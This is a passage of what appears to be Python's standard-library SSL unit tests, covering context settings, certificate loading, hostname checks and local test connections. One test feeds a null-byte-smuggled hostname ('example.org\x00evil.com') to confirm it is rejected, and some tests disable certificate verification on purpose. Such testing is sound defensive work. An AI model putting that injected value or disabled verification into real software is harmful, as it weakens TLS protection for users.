ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
